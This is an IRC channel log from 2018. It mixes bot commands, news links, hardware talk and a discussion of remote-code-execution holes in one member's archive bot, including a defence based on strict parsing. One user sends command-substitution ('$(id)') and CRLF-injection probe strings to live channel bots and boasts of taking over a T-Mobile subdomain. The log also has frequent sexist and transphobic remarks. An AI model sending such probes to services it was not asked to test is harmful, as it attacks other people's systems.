1792656;1522784803;a111;Logged on 2018-02-26 17:11 mircea_popescu: spyked the bot is a solved problem, genesis and all. 1792657;1522784850;mircea_popescu;cool. 1792658;1522784957;deedbot;http://qntra.net/2018/04/british-government-lab-admits-no-evidence-for-scandal-used-to-blow-up-diplomatic-relations-and-court-european-sympathy/ << Qntra - British Government Lab Admits No Evidence For Scandal Used To Blow Up Diplomatic Relations And Court European Sympathy 1792659;1522785082;mircea_popescu;BingoBoingo mind redirecting www to . sometime too ? 1792660;1522785116;asciilifeform;umm qntra down ?? 1792661;1522785120;BingoBoingo;mircea_popescu: Sure, I will take a look at it 1792662;1522785122;mircea_popescu;try without the www 1792663;1522785124;asciilifeform;or nm worx 1792664;1522785140;phf;http://btcbase.org/log/2018-04-03#1792608 kek 1792665;1522785140;a111;Logged on 2018-04-03 19:20 douchebag: https://i.imgur.com/S18PzjG.png 1792666;1522785248;mircea_popescu;"in natural languages, we are used to context. indeed, contextual meaning is what makes natural languages natural. we have `list' as a verb, and we have `list' as a noun. we have `listless' as an adjective describing something (like a programming language) that does not have lists, and an adjective describing someone who is sort of permanently tired. when we need to disambiguate, we do so with more words." 1792667;1522785275;mircea_popescu;this actually misses the all-important mechanism. "when we need to disambiguate, we add more words such as to contradict one of the two possible solutions the string could eval to" 1792668;1522785303;mircea_popescu;whole fucking natural language is nothing beyhond "add aix^i terms until the damned P has only one real root." 1792669;1522785489;mircea_popescu;and "default" is not a perfectly reasonable variable name holy shit. is this guy going to name his daughter "Cunt" ? 1792670;1522785776;mircea_popescu;asciilifeform http://p.bvulpes.com/pastes/KLT6U/?raw=true 1792671;1522786791;asciilifeform;mircea_popescu: yay! and yes. 1792672;1522786811;asciilifeform;2 per crate. 1792673;1522786819;mircea_popescu;cool. 1792674;1522789492;shinohai;> Bans gun videos, gets live-action shooting instead http://archive.is/NyMvo 1792675;1522789612;trinque;shinohai: https://archive.is/TgtPb << breitbart didn't neglect the "wearing a headscarf" deets 1792676;1522789649;shinohai;Allah snackbar! 1792677;1522789654;asciilifeform;'We are seeing @YouTube employees being brought out with hands up!' << lol 1792678;1522789678;trinque;they didn't offer up their assholes quick enough? 1792679;1522790090;mircea_popescu;heh 1792680;1522791853;deedbot;http://trilema.com/2018/on-namespaces/ << Trilema - On namespaces 1792681;1522792123;douchebag;glad work is over 1792682;1522792138;douchebag;Fucking had this dude from work looking over my shoulder 1792683;1522792155;douchebag;asking questions about everything I type in my terminal 1792684;1522792275;mircea_popescu;what sort of chickenfarm do you work in lol 1792685;1522792321;douchebag;Most of the people there are alright 1792686;1522792337;douchebag;This is just new kid who just likes asking too many questions 1792687;1522792354;asciilifeform;damn i had nfi douchebag were chained to an oar. suxx. 1792688;1522792355;douchebag;and doesn't understand it's considered disrespectful to stare at someone elses computer screen 1792689;1522792389;douchebag;nfi? 1792690;1522792451;mircea_popescu;no fucking idea 1792691;1522792462;douchebag;ahh 1792692;1522792505;douchebag;Yeah no it was fine most of the day, this kid would just get out of his seat and stand behind me and start staring at what I was doing and asked a bunch of questions 1792693;1522792760;douchebag;how about that shooting though 1792694;1522792780;douchebag;so much for mass shooting being a men only sort of deal 1792695;1522792913;asciilifeform;bbut lead is banned in californistan!111 1792696;1522792916;asciilifeform;what nao, ban tits ? 1792697;1522793055;douchebag;lolol 1792698;1522793065;douchebag;asciilifeform: Only womens tits 1792699;1522793075;douchebag;Tranny tits are a-okay in California 1792700;1522793721;mircea_popescu;basically "liberation" and "4th wave feminism" consists of a bunch of male dweebs with no utility that nobody wants appropriating feminity and taking over boobs. 1792701;1522793740;mircea_popescu;ain't enough they kicked women out of the last well paying job available to them (nursing), now they're gonna steal the tits, too ? 1792702;1522793827;asciilifeform;lol waitasec this was a trans-postal? 1792703;1522793958;mircea_popescu;nfi, i was discussing the "women in tech" trend generally. 1792704;1522793979;asciilifeform;aa 1792705;1522794001;mircea_popescu;there's by now a large and visible class of dweebs who considered the "should i learn github or get boobs" dilemma and came out with "better get boobs -- govt pays for it." 1792706;1522794010;douchebag;Men need to stop acting like women and women need to stop acting like men, imo 1792707;1522794037;mircea_popescu;men can't stop acting like women -- there's really nothing else for them. 1792708;1522794218;asciilifeform;in other 'holyfuq, chinesium', 1500000 (!) baud default uart. 1792709;1522794250;*;asciilifeform in fact was not able to find a single usb uart that will reliably rx it: had to use logic analyzer 1792710;1522795110;*;asciilifeform did in the end find one : ye olde ft232 1792711;1522795739;shinohai;http://therealbitcoin.org/ml/btc-dev/2018-April/000295.html << ty jurov for handling donation, cheers! [~]D 1792712;1522796119;mod6;Hey, thanks for your donation shinohai! 1792713;1522796132;shinohai;cheers as well! o7 1792714;1522796780;douchebag;just buy the fucking water filters already 1792715;1522798598;lobbes;oy, yup this is the spoofed user agent that the phantomjs portion of the process was using. RCE was happening both at the bash level AND via the headless browser.. I got poked in several orifices >> http://btcbase.org/log/2018-04-03#1792665 1792716;1522798598;a111;Logged on 2018-04-03 19:52 a111: Logged on 2018-04-03 19:20 douchebag: https://i.imgur.com/S18PzjG.png 1792717;1522798604;lobbes;!!v B7975B7CA5C064DEC53DCE43D14C35C0F1D735FB0F849EE418B922F3A81502F5 1792718;1522798604;deedbot;lobbes rated douchebag 2 << exploited several security holes in my archive process, but was nice enough to tell me rather than pwn me 1792719;1522798623;douchebag;<3 1792720;1522798656;douchebag;lobbes: Mind sharing the source code? I could perhaps help you identify further exploits 1792721;1522798662;douchebag;i wonder 1792722;1522798750;douchebag;!!ratings douchebag 1792723;1522798751;deedbot;http://p.bvulpes.com/pastes/AhSME/?raw=true 1792724;1522798771;douchebag;!!reputation douchebag 1792725;1522798772;deedbot;http://p.bvulpes.com/pastes/xgnGJ/?raw=true 1792726;1522798821;lobbes;my plan tonight is to go through and map out whole process (I'll probably tar up my code after I attempt to sanitize inputs), will bake a blog post exposing my naivete to forum at large 1792727;1522798843;lobbes;I gotta learn somehow 1792728;1522798867;phf;mircea_popescu: "Unlike obligate coprophagiacs, subsistence hunters could not be stone age fucktards, but for whatever reason opt not to." is there a double not in there? 1792729;1522798883;shinohai;dont be so hard on self, supbybot/limnoria is broken so beautifully anyway 1792730;1522798905;douchebag;lobbes: I'll help you make your bot more secure 1792731;1522798923;lobbes;ty douchebag! much appreciated 1792732;1522798958;lobbes;and shinohai, as much as I'd like to blame this on supybot, this one is all me (the exploited code was all brewed by yours truly) 1792733;1522798980;douchebag;Just tell me essentially what it is you're trying to do, what you have already tried, and then I'll suggest you how to write it properly 1792734;1522798989;shinohai;O.o nb lobbes 1792735;1522799224;lobbes;douchebag well, it is very convoluted atm. besides, I'd rather there be a static page I can point to than just barfing it in the logs 1792736;1522799281;lobbes;I agree this needs archiving (I'm currently working off their version of kritik der reinen vernunft as a german study aid). However, unlike kibo.com I would wager the entirety of gutenberg is much much larger. I'd prolly need moar storage than the ~200gb ssd on the dedicated home craptop I'm currently using (but maybe not) >> http://btcbase.org/log/2018-04-03#1792648 1792737;1522799281;a111;Logged on 2018-04-03 19:41 mircea_popescu: oh, and : lobbes other than the design review, consider lifting the whole of gutenberg into your archive ? the idiots already have a https that is broken, so far http only works but who knows how long. 1792738;1522799295;*;lobbes bbl food 1792739;1522799311;douchebag;Forsure, I'm rather experience with application design from a security prespective so just let me know if you have any questions 1792740;1522799378;douchebag;Just make sure a problem like that doesn't occur again. Remote code execution is just as bad as it can get 1792741;1522799488;trinque;heh, meanwhile, all of sexual reproduction is based on getting those RCEs 1792742;1522799504;douchebag;trinque: That's true 1792743;1522799580;douchebag;and I'll tell you why, when working for a company doing a security audit - you will get paid the most for RCE. Women love money, and that money can be used to help take care of the children 1792744;1522799592;douchebag;PWN BOXES 2 HELP THE CHILDREN 1792745;1522799687;trinque;why, is that's what sperm do, my man. 1792746;1522799767;douchebag;eventually 1792747;1522799790;trinque;http://btcbase.org/log/2016-09-17#1543393 << thread 1792748;1522799790;a111;Logged on 2016-09-17 02:55 mircea_popescu: trinque fancy that, you had to have someone tell you! nature teaches by example, you stick more data into woman each time than you ever did into all machines you ever touched. yet... 1792749;1522799794;douchebag;trinque: What other bots are in here besides lobbes and deedbot 1792750;1522799809;asciilifeform;pehbot ! 1792751;1522799816;douchebag;whats the syntax 1792752;1522799819;trinque;^ and mimisbrunnr 1792753;1522799820;asciilifeform;!!up pehbot 1792754;1522799821;deedbot;pehbot voiced for 30 minutes. 1792755;1522799827;douchebag;also syntax for mimisbrunnr 1792756;1522799843;asciilifeform;!A help 1792757;1522799843;pehbot;asciilifeform: I am PehBot. See also http://www.loper-os.org/?p=2051 . My Width is currently fixed to 256 and Height to 32. 1792758;1522799856;trinque;I think mimisbrunnr only quotes log-lines; it's ben_vulpes' 1792759;1522799888;asciilifeform;!#s pehbot 1792760;1522799889;a111;98 results for "pehbot", http://btcbase.org/log-search?q=pehbot 1792761;1522799891;asciilifeform;^ see also. 1792762;1522800016;douchebag;!#s $(id) 1792763;1522800016;a111;0 results for "$(id)", http://btcbase.org/log-search?q=$%28id%29 1792764;1522800019;BingoBoingo;http://btcbase.org/log/2018-04-03#1792659 << fixed 1792765;1522800019;a111;Logged on 2018-04-03 19:51 mircea_popescu: BingoBoingo mind redirecting www to . sometime too ? 1792766;1522800162;douchebag;!#help 1792767;1522800167;douchebag;!#h 1792768;1522800183;douchebag;!A 'help 1792769;1522800183;pehbot;douchebag: EGGOG: Pos: 0: Stack Underflow! 1792770;1522800201;douchebag;!A ''help 1792771;1522800201;pehbot;douchebag: EGGOG: Pos: 0: Stack Underflow! 1792772;1522800207;douchebag;!A help 1792773;1522800207;pehbot;douchebag: I am PehBot. See also http://www.loper-os.org/?p=2051 . My Width is currently fixed to 256 and Height to 32. 1792774;1522800213;trinque;any chance this can be done in pm asciilifeform ? 1792775;1522800215;mod6;^ 1792776;1522800217;trinque;before someone gets cranky? 1792777;1522800225;douchebag;I agree 1792778;1522800227;mod6;to late 1792779;1522800233;asciilifeform;trinque: not as such. BUT he really oughta build the proggy and do in his own shell. 1792780;1522800240;trinque;there ya go. 1792781;1522800244;douchebag;kk 1792782;1522800330;douchebag;can I try one last command really quick? 1792783;1522800334;asciilifeform;sure? 1792784;1522800355;douchebag;!#s \r\nTEST 1792785;1522800355;a111;0 results for "\\r\\nTEST", http://btcbase.org/log-search?q=%5Cr%5CnTEST 1792786;1522800366;douchebag;Good job stripping them ! 1792787;1522800381;asciilifeform;actually, douchebag , it does no such thing 1792788;1522800392;asciilifeform;well, pehbot that is 1792789;1522800418;douchebag;I was talking about a111 1792790;1522800424;asciilifeform;aa 1792791;1522800473;douchebag;If those lines weren't stripped I could potentially send my own commands to the ircd 1792792;1522800477;asciilifeform;i've temporarily moved it to #asciilifeform-test, douchebag , justforyou ! 1792793;1522800482;douchebag;thx <3 1792794;1522800486;asciilifeform;plz join. 1792795;1522800667;phf;which reminds me that i should implement the help feature, a111 is no conformant at the moment 1792796;1522801035;phf;douchebag: a111 logs, speaks logs, responds to #!s #!seen #!seenbefore #!born and #!vulpes 1792797;1522801115;phf;of which only #!s and #!seen are useful, and #!born mildly interesting 1792798;1522801120;phf;#!born douchebag 1792799;1522801128;phf;!#born douchebag 1792800;1522801128;a111;2018-01-11 douchebag 1792801;1522801128;a111;http://btcbase.org/log/2018-01-11#1768869 1792802;1522801254;douchebag;http://btcbase.org/log/2018-04-03#$(id) 1792803;1522801307;phf;well, since we're testing things http://btcbase.org/log/2018-04-03#1231231231231 1792804;1522801365;douchebag;phf: What sort of topics do you primarily focus on? 1792805;1522801403;douchebag;In regards to programming/security/technology ect.. 1792806;1522801786;phf;it really depends on when 1792807;1522801849;phf;but relevant to the conversation, i grew up in russia in the 90s, so i did infosec until 2005 or so 1792808;1522802097;phf;there might be an xss somewhere in btcbase, but highly unlikely 1792809;1522802118;phf;i did several talks on the idea that sanitizing data is retarded, and that you're supposed to have a proper parsing strategy instead. that it's in other words an impedance mismatch problem, and if you teach computer your assumptions it will be impossible to have injection issues 1792810;1522802261;phf;so cl-irc isn't "stripping away" faulty sequences, there's a state machine parser there that only accepts a valid irc protocol, likewise the renderer is not escaping html, instead the dom is constructed server side and where you have strings, you can only have strings. they will be serialized into html according to html escaping rules. 1792811;1522802818;asciilifeform;phf: i was vaguely hoping he might grasp this by playing with pehbot / reading ffa ; but loox like no dice so far 1792812;1522802895;asciilifeform;going by the log in #asciilifeform-test, d00d 1) still refuses to actually read the proggy 2) continues to think that it remaining standing has something at all to do with 'sanitizing' or anticipating whatever attack 1792813;1522802998;douchebag;I've never programmed in the language it was written in 1792814;1522803005;douchebag;So it makes it a bit difficult 1792815;1522803049;asciilifeform;being one of the few languages with actual docs, and of which i used a deliberately small subset -- oughta be pretty simple. 1792816;1522803070;asciilifeform;( oop for instance is not used. nor is heap allocation . ) 1792817;1522803970;asciilifeform;meanwhile, in sads, RK3328 ( and in fact every arm cpu in production ) won't boot without a ~1MB evil blob (that in fact runs on dedicated evil-core, just like intel's ME . ) so much for 'published errything.' 1792818;1522803998;asciilifeform;and, interestingly, the entire public net appears to be EMPTY of ANY discussion of a cure. 1792819;1522805937;lobbes;so, this is kind of like the "default-deny" philosophy? "you may only build the house from this valid list of materials" versus "grab any material you can find, but watch out for this list of lethal building materials"? >> http://btcbase.org/log/2018-04-04#1792809 1792820;1522805937;a111;Logged on 2018-04-04 00:35 phf: i did several talks on the idea that sanitizing data is retarded, and that you're supposed to have a proper parsing strategy instead. that it's in other words an impedance mismatch problem, and if you teach computer your assumptions it will be impossible to have injection issues 1792821;1522807175;trinque;the grammar asserts what ought to be there; it rejects everything else, but it didn't reject the "all else" item by item. 1792822;1522807272;lobbes;hm yeah, applying this to my case: there is only ONE point where user-entered data enters into the process, and that is where the bot snarfs from the chan and inserts into the first sqlite3 db. So really, I just need to teach THAT part of my process what a valid url is, and then parse accordingly 1792823;1522807290;trinque;parser implements a given grammar, turning a string (whether considered as text or raw bits) into an abstract syntax tree 1792824;1522807404;lobbes;hm okay, this is a bit over my head, but you are saying that I need to understand what the grammar for a url is, and then have the parser follow that grammar? 1792825;1522807682;douchebag;lobbes: Why not completely avoid sending any user input to a bash interpreter at all? 1792826;1522807784;lobbes;well, it seems like phf's (and others') approach is slightly saner. Even if user input doesn't go to bash, well.. what about the phantomjs exploit you found 1792827;1522807796;lobbes;I cannot possibly enumerate what I haven't thought of 1792828;1522807812;lobbes;but I CAN enumerate a valid url 1792829;1522807881;trinque;sure douchebag, not saying do that either 1792830;1522807935;lobbes;yeah, true, I really should do both 1792831;1522808361;lobbes;there's also an additional precaution I could take: instead of the thing being on an hourly cronjob, I could easily set up a quick 'validation report' for myself and then pull a 'manual' crank to initiate everything 1792832;1522808372;lobbes;ala deedbot and other items 1792833;1522809012;asciilifeform;hey trinque , i was attempting a gentoo , and found that i cannot even extract a 2016 stage3 on a sane box because --xattrs-include='*.*' and my tar has nfi what xattrs are 1792834;1522809022;asciilifeform;trinque: any idea when this liquishit crept in ? 1792835;1522809032;asciilifeform;what's the most recent stage3 that hasn't got it ? 1792836;1522810139;mircea_popescu;http://btcbase.org/log/2018-04-03#1792728 << yes, actually. x could not be y, but opt to not-not be y. is this bad ? 1792837;1522810139;a111;Logged on 2018-04-03 23:41 phf: mircea_popescu: "Unlike obligate coprophagiacs, subsistence hunters could not be stone age fucktards, but for whatever reason opt not to." is there a double not in there? 1792838;1522810155;asciilifeform;incidentally trinque do you know of a musltronic stage3 for arm ? 1792839;1522810363;mircea_popescu;http://btcbase.org/log/2018-04-03#1792736 << it's not that big. but, if indeed it is that big this is a reason to find more storage space, can't really cut them off. 1792840;1522810363;a111;Logged on 2018-04-03 23:48 lobbes: I agree this needs archiving (I'm currently working off their version of kritik der reinen vernunft as a german study aid). However, unlike kibo.com I would wager the entirety of gutenberg is much much larger. I'd prolly need moar storage than the ~200gb ssd on the dedicated home craptop I'm currently using (but maybe not) >> http://btcbase.org/log/2018-04-03#1792648 1792841;1522810418;mircea_popescu;http://btcbase.org/log/2018-04-03#1792743 << bwahaha wut. 1792842;1522810418;a111;Logged on 2018-04-03 23:53 douchebag: and I'll tell you why, when working for a company doing a security audit - you will get paid the most for RCE. Women love money, and that money can be used to help take care of the children 1792843;1522810468;mircea_popescu;!!up candi_lustt 1792844;1522810468;deedbot;candi_lustt voiced for 30 minutes. 1792845;1522810479;mircea_popescu;^ there douchebag , now you can learn lips. 1792846;1522810554;mircea_popescu;and in other "best villains of the silver screen", https://www.youtube.com/watch?v=-N9LnkKQfuc 1792847;1522810673;mircea_popescu;#!born douchebag 1792848;1522810680;mircea_popescu;!#born phf 1792849;1522810680;a111;2014-03-20 not quite 1792850;1522810680;a111;http://btcbase.org/log/2014-03-20#570859 1792851;1522810689;mircea_popescu;phf it's supposed to produce no more than one line per command. 1792852;1522810840;mircea_popescu;http://btcbase.org/log/2018-04-04#1792811 << this is not something that can be "grasped" as such. 1792853;1522810840;a111;Logged on 2018-04-04 00:46 asciilifeform: phf: i was vaguely hoping he might grasp this by playing with pehbot / reading ffa ; but loox like no dice so far 1792854;1522810860;mircea_popescu;much in the vein astronomy can not be grasped playing with ptolemaic spheres. 1792855;1522810889;mircea_popescu;http://btcbase.org/log/2018-04-04#1792809 << links ? hm ? HM ? 1792856;1522810890;a111;Logged on 2018-04-04 00:35 phf: i did several talks on the idea that sanitizing data is retarded, and that you're supposed to have a proper parsing strategy instead. that it's in other words an impedance mismatch problem, and if you teach computer your assumptions it will be impossible to have injection issues 1792857;1522810923;mircea_popescu;i mean my talk to ro politicians about basic economics from like 2005 is on the fucking web ffs! 1792858;1522810938;mircea_popescu;and the time i burned the koran/bible and the time i stabbed that rabbit and so following. 1792859;1522810949;*;asciilifeform actually watches the 2005 one , it was lulzy 1792860;1522810952;asciilifeform;*watched 1792861;1522811005;mircea_popescu;dja understand what it says ? 1792862;1522811038;asciilifeform;at the time understood maybe half . really oughta rewatch these days 1792863;1522811042;mircea_popescu;http://trilema.com/2009/banii-oamenii-si-valorile-liberale/ << uncharacteristically for vloggers, transcript is available. 1792864;1522811059;asciilifeform;oh hah. 1792865;1522811074;asciilifeform;this almost takes out all the sport tho. 1792866;1522811080;mircea_popescu;myeah. 1792867;1522811400;mircea_popescu;incidentrally, the comments are something else. 1792868;1522811475;asciilifeform;http://p.bvulpes.com/pastes/LsmJG/?raw=true << d00d's total effort in re pehbot , thus far. 1792869;1522811521;mircea_popescu;im sure he'll say something if he finds something neh 1792870;1522811559;asciilifeform;doesn't show any symptoms of approaching the thing in any way other than http://btcbase.org/log/2016-05-01#1460013 1792871;1522811559;a111;Logged on 2016-05-01 14:53 mircea_popescu: asciilifeform> mod6: the baked-in presumption of webtardism is almost insulting << it is insulting, not to us though. think about it : the crab has pincers because in its environment THAT WORKS ; and so does "GET /blog/blog-config.php~". 1792872;1522812199;mircea_popescu;eh, what;'s the rush. 1792873;1522812265;mircea_popescu;http://btcbase.org/log/2018-04-04#1792817 << fuck 'em. let them sell to each other for bitpaybux until they fall over for all i care. 1792874;1522812265;a111;Logged on 2018-04-04 01:06 asciilifeform: meanwhile, in sads, RK3328 ( and in fact every arm cpu in production ) won't boot without a ~1MB evil blob (that in fact runs on dedicated evil-core, just like intel's ME . ) so much for 'published errything.' 1792875;1522812284;mircea_popescu;http://btcbase.org/log/2018-04-04#1792818 << the english web is empty of EVERYTHING. there isn't anything there. i looked. 1792876;1522812284;a111;Logged on 2018-04-04 01:06 asciilifeform: and, interestingly, the entire public net appears to be EMPTY of ANY discussion of a cure. 1792877;1522812324;asciilifeform;mircea_popescu: it's chinese, therefore lulzy. mine seems to boot up with the shitrom broken... 1792878;1522812345;mircea_popescu;yes but it probably doesn't have $random-useless-feature!!1 1792879;1522812365;asciilifeform;boots -- believe or not -- a gentoo. 1792880;1522812368;asciilifeform;as of 5min ago. 1792881;1522812386;mircea_popescu;http://btcbase.org/log/2018-04-04#1792831 << this is the worst choice, in general. 1792882;1522812386;a111;Logged on 2018-04-04 02:19 lobbes: there's also an additional precaution I could take: instead of the thing being on an hourly cronjob, I could easily set up a quick 'validation report' for myself and then pull a 'manual' crank to initiate everything 1792883;1522812509;mircea_popescu;http://btcbase.org/log/2018-04-04#1792834 << ext4 1792884;1522812509;a111;Logged on 2018-04-04 02:30 asciilifeform: trinque: any idea when this liquishit crept in ? 1792885;1522812517;mircea_popescu;fwiw, iirc reiserfs has them too. 1792886;1522812522;asciilifeform;it's in tar. 1792887;1522812526;asciilifeform;from 1.27 and up. 1792888;1522812541;asciilifeform;q for trinque was , when did gentoo stage3 start using this 'feature'. 1792889;1522812551;mircea_popescu;probably once they started supporting ext4. 1792890;1522812557;mircea_popescu;anyway, odds are you can just take it out. 1792891;1522812563;asciilifeform;nope. $box supports ext4 , but tar 1.26. 1792892;1522812590;mircea_popescu;just drop the flag, see what happens. 1792893;1522812616;asciilifeform;and i untarred in spite of this oddity, and the only barf was that python, ping, and cc1 binaries failed to extract. but oddly enuff extracted later manually... 1792894;1522812625;asciilifeform;and appear to work 1792895;1522812683;mircea_popescu;anyway. extended attributes is this ~dead standard that got implemented anyway, basically a kludgy extension of chown. 1792896;1522812701;*;asciilifeform did realize this 1792897;1522812707;mircea_popescu;the flag tells tar whether to store this extra metadata with the files or not. generally droppoing it has no effect. ah ok then 1792898;1522813117;*;trinque couldn't say, haven't tilted at tar just yet 1792899;1522816048;mircea_popescu;"password length can not exceed 12 characters". teh webfolk clearly doing it rite. 1792900;1522816104;deedbot;http://trilema.com/2018/no-such-labs-snsa-march-2018-statement/ << Trilema - No Such lAbs (S.NSA), March 2018 Statement 1792901;1522816341;mircea_popescu;asciilifeform ^ lemme know if i left anything out. 1792902;1522816528;mircea_popescu;in other world wide webs, "* Topic for #gaygeeks is: Welcome to #gaygeeks, a PG-rated social channel for geeky LGBT people and friends." 1792903;1522816565;douchebag;I just jacked one of T-Mobiles sub domains 1792904;1522816696;mircea_popescu;lol 1792905;1522816778;mircea_popescu;https://pbs.twimg.com/media/DZ3k2jxWkAAFhx9.jpg << hacks. HACKS, you understand. because "women in tech" => "fucking around with your phone on facebook is now hacking". 1792906;1522816904;mircea_popescu;and oh look, anil dash still exists. in fact, the whole twitter "tech" poser scene is still there! amazing. 1792907;1522817359;mircea_popescu;in other lulz, /me joins #lesswrong. there's a "* Loaded log from Sat Sep 20 11:53:02 2014" ; then /me joins #startups. there's a "Loaded log from Sat Sep 20 11:52:17 2014". apparently... i did this once before ? 1792908;1522820557;lobbes;not sure if pete_dushenski is ever coming around again or what, so I went ahead and created a page for the tsmr bot directory: http://lobbesblog.com/static/tmsr_bot_directory.html 1792909;1522820690;lobbes;I purposely decided not to curate the actual commands. I figure that is best left to the operator to maintain 1792910;1522820702;mircea_popescu;what do you mean curate ? 1792911;1522820739;lobbes;like "x bot has added n commands, plox to update directory" 1792912;1522820804;lobbes;as it stood, my own bot's commands on the old directory weren't even represented accurately. plus the spec does specify each bot should have a "help" command listing all other commands 1792913;1522820990;mircea_popescu;ah so basically you didn't ~include~ the command list. 1792914;1522821162;lobbes;yeah, sorry, I was kinda unclear; just lists the bot name, operator, and call command 1792915;1522821212;mircea_popescu;kk 1792916;1522824878;mircea_popescu;aaand closing channels. #lesswrong is spectacularily retarded. i mean wikitardia levels of inane wank. #clojure and #bash are mostly dead, 99% join/part and the rest hi guise, i got a dumb question. startup and gaygeeks are dead. 1792917;1522825004;mircea_popescu;i suspect the internet was actually LARGER in 1988. 1792918;1522825012;mircea_popescu;shrunk like 60% in 30 years. 1792919;1522850404;trinque;!!v 6436E4C2DF0E7C877AC3A106A02C8A85D1E400F8C36F42025D4986BA5F02D825 1792920;1522850423;deedbot;Invoiced ben_vulpes 0.21483957 << server purchase 1792921;1522854295;deedbot;http://qntra.net/2018/04/second-chinese-tariff-announcement-this-week-hits-us-soybeans-with-25-levy/ << Qntra - Second Chinese Tariff Announcement This Week Hits US Soybeans With 25% Levy 1792922;1522855965;deedbot;http://qntra.net/2018/04/workplace-violence-hits-youtube-disgruntled-content-creator-shoots-coworkers-and-kills-self/ << Qntra - Workplace Violence Hits Youtube: Disgruntled Content Creator Shoots Coworkers And Kills Self 1792923;1522859993;deedbot;http://qntra.net/2018/04/usg-alleges-rogue-cellular-site-simulators-in-capitol-region/ << Qntra - USG Alleges "Rogue" Cellular Site Simulators In Capitol Region 1792924;1522864127;BingoBoingo;https://www.rt.com/sport/423161-commonwealth-games-england-african-country/ << "Commonwealth Games organizers have confused England with the African Republic of The Gambia in the event’s official program, which contains information about the 71 nations participating." 1792925;1522864619;lobbes;Lol. Rest of the world catching up to Qntra's accurate classifications of various Anglotardistans 1792926;1522864635;BingoBoingo;Gotta start somewhere. 1792927;1522871206;mircea_popescu;aaand in other http://btcbase.org/log/2018-04-03#1792405 : cat trilema.com.txt | grep "/2009/banii-oamenii-si-valorile-liberale/" | grep "leusercontent" > http://p.bvulpes.com/pastes/foK6J/?raw=true 1792928;1522871206;a111;Logged on 2018-04-03 17:26 asciilifeform: y'know it's still 'read' if you put it through meatgrinder 1792929;1522871275;mircea_popescu;2.7k lines between 8 and 10 this am, that's like... more interest in the ro language than the romanian government ever managed to generate in the entire history of a romanian government, spanning 1866-2018 1792930;1522871385;mircea_popescu;meanwhile in local news bulletin : took slut out shopping yest, bought her a mostly see through and very ass-flattering dress at a shop which identifies itself as : "Punt. San Jose, centro al frente de la puerta principal del Colegio de Senoritas." 1792931;1522871392;mircea_popescu;punt indeed. punters beware. 1792932;1522871464;asciilifeform;ohai mircea_popescu ! 1792933;1522871469;asciilifeform;http://btcbase.org/log/2018-04-04#1792901 << loox proper 1792934;1522871469;a111;Logged on 2018-04-04 04:32 mircea_popescu: asciilifeform ^ lemme know if i left anything out. 1792935;1522871471;deedbot;http://trilema.com/2018/moron/ << Trilema - Moron 1792936;1522871486;mircea_popescu;hola! 1792937;1522871530;asciilifeform;meanwhile on the chinesium front, asciilifeform was pretty close to throwing out the 'rockchip' this morn., when saw that every few hrs it read-retries the sd flash. but apparently harmless eggog: comes from certain sad levelling firmwares , they cannot keep up with the host 1792938;1522871581;asciilifeform;but aside from this, 'throw out, or buy five more?', i have a self-rebuilding gentoo, and theoretically recent 'uboot' gives a blobless boot and ergo 100% blobless machine that actually fucking builds own kernel and gcc and etc etc 1792939;1522871605;mircea_popescu;ahhh 1792940;1522871654;mircea_popescu;to quote from the everlogs, http://btcbase.org/log/2018-03-23#1789029 1792941;1522871654;a111;Logged on 2018-03-23 04:14 douchebag: Okay, why do you guys liek arguing so much? Is this why you guys don't get anything done? 1792942;1522871671;asciilifeform;bahahaha 1792943;1522871675;asciilifeform;http://btcbase.org/log/2018-04-04#1792907 << >> http://trilema.com/2014/the-irc-world-is-a-big-but-very-flat-place 1792944;1522871675;a111;Logged on 2018-04-04 04:49 mircea_popescu: in other lulz, /me joins #lesswrong. there's a "* Loaded log from Sat Sep 20 11:53:02 2014" ; then /me joins #startups. there's a "Loaded log from Sat Sep 20 11:52:17 2014". apparently... i did this once before ? 1792945;1522871685;mircea_popescu;a yeah! 1792946;1522871692;mircea_popescu;well... nothing changed in four years. 1792947;1522871709;asciilifeform;was it ~100% join/partolade by volume? 1792948;1522871744;mircea_popescu;to be specific : http://p.bvulpes.com/pastes/rnjFD/?raw=true 1792949;1522871766;mircea_popescu;asciilifeform no, the moneyshot is, "I'm going to need a source on that. the doctor dude seems to know what he's doing. also the ballistic gelatin is kinda hard to argue against" 1792950;1522871780;asciilifeform;'navigating-and-or-avoiding-the-inpatient-mental-health-system' << already 'winning' in chan subjline ! 1792951;1522871801;mircea_popescu;the gist of the argument is, them : wank wank wank ; me : your wank is only meaningful self-referentially ; them : you are wrong because self-reference. 1792952;1522871814;asciilifeform;this is livelier than asciilifeform expected 1792953;1522871874;mircea_popescu;i guess. fucktards dun know how to separate eggs. pro tip : TAKE IT IN YOUR HAND. omfg, basic slavegirl kitchen training. 1792954;1522871917;asciilifeform;lol, small arms wank! where are the planet-eaters, the solar shade weapon specialists, the immortality pills?!11 1792955;1522871935;asciilifeform;where did they hide the trooo lesswrongists. 1792956;1522872138;mircea_popescu;se ? 1792957;1522872140;mircea_popescu;see* ? 1792958;1522872185;asciilifeform;possibly the truly prolific crackpots began to have problem navigating-and-or-avoiding-the-inpatient-mental-health-system(tm)(r) and left these... 1792959;1522872214;mircea_popescu;either that or the ever growing self-absorption of esl speakers has... well.. absorbed. 1792960;1522873711;mircea_popescu;incidentally, that "'navigating-and-or-avoiding-the-inpatient-mental-health-system" is about as fucking terrible as haskellists code. 1792961;1522873753;mircea_popescu;it's fundamentally wrong, ideologically offensive, practically useless at best and counterproductive in general, deeply myopic, utterly nonsensical and the list could go on. holy shit why even bother exist if you're going to be the guy that spewed it. 1792962;1522873785;*;asciilifeform confesses : did not read 1792963;1522873896;*;asciilifeform reports, however, that the archaetypical emerge -av --update --deep @world on chinesiumtron , to the tune of 117 various packages, took ~4hr. which is, lulzily, approx the same as on my workstations 1792964;1522873936;asciilifeform;with -j5 in make.conf (i.e. 100% cpu utilization) ; but heatsink not even warm 1792965;1522874010;asciilifeform;note, this beast has a video jack, could in principle be used as gentooistic workstation. 1792966;1522875090;asciilifeform;... thing built with my USE flags, incl. ban on gcc >=5 ( i used a stage3 tarball from 2016 deliberately , but with current-day portage snapshot ) -- no serious barf 1792967;1522876186;mircea_popescu;notbad 1792968;1522876484;ben_vulpes;http://logs.bvulpes.com/trilema?d=2018-4-4#325784 << wow this is a veritable 4000-class locomotive 1792969;1522876486;mimisbrunnr;Logged on 2018-04-04 20:20 mircea_popescu: it's fundamentally wrong, ideologically offensive, practically useless at best and counterproductive in general, deeply myopic, utterly nonsensical and the list could go on. holy shit why even bother exist if you're going to be the guy that spewed it. 1792970;1522879703;asciilifeform;!!up BigTexasBingo 1792971;1522879704;deedbot;BigTexasBingo voiced for 30 minutes. 